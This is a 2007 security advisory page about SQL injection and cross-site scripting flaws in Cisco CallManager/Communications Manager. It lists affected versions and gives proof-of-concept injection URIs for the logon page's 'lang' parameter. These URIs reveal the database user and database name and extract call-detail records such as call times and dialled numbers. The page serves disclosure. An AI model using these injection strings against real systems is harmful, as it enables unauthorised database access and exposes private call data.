exploits , vulnerabilities , articles , Cisco CallManager/Communications Manager SQL Injection and Cross-Site Scripting Vulnerabilities

Title	Cisco CallManager/Communications Manager SQL Injection and Cross-Site Scripting Vulnerabilities
Published	2007-08-29-12:00AM
Updated	2007-09-04-10:51PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	The vendor disclosed these issues.
Vulnerable	Cisco Unified Communications Manager 4.2(3)sr.2 Cisco Unified Communications Manager 4.2 (3)SR2b Cisco Unified CallManager 4.2(3)SR1 Cisco Unified CallManager 4.2 Cisco Unified CallManager 4.1(3)SR4 Cisco Unified CallManager 4.1(3)sr.5 Cisco Unified CallManager 4.1 (3)SR5b Cisco Unified CallManager 4.1 Cisco Unified CallManager 4.0 Cisco Unified CallManager 3.3(5)sr3 Cisco Unified CallManager 3.3(5)sr3 Cisco Unified CallManager 3.3(5)SR2a Cisco Unified CallManager 3.3(5)SR2a Cisco Unified CallManager 3.3
Not Vulnerable	Cisco Unified Communications Manager 4.3(1)sr.1 Cisco Unified CallManager 4.2(3)sr2 Cisco Unified CallManager 4.1(3)sr5 Cisco Unified CallManager 3.3(5)sr2b
Code	To exploit the cross-site scripting vulnerability, an attacker entices an unsuspecting victim to follow a malicious URI. The attacker can exploit the SQL-injection vulnerability through a browser.The following proof-of-concept URIs are available for the SQL-injection vulnerability:To display the logged-in database user:https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='To display the selected database:https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='To display the UNIX time when a call was made from extension 12345:https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='To display the destination number for that call. Replace "1174900000" with the value from the previous query:https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-12-01 SystemImager Flamethrower Insecure Temporary File Creation Vulnerabilities
• 2008-12-01 Rumpus FTP Server Command Argument Remote Buffer Overflow Vulnerability
• 2008-12-01 Rumpus FTP Server HTTP Command Remote Denial of Service Vulnerability
• 2008-11-29 Multiple ActiveWebSoftwares Products Login Parameters SQL Injection Vulnerabilities
• 2008-11-29 Venalsur Booking Centre Multiple Cross-Site Scripting Vulnerabilities
• 2008-11-28 ReVou Login SQL Injection Vulnerability
• 2008-11-28 Web Calendar System SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-11-28 SailPlanner Login SQL Injection Vulnerability
• 2008-11-28 Livio.net WEB Calendar Cross Site Scripting and Multiple SQL Injection Vulnerabilities
• 2008-11-28 Subtext Anchor Tags HTML Injection Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 10:27:33 +0000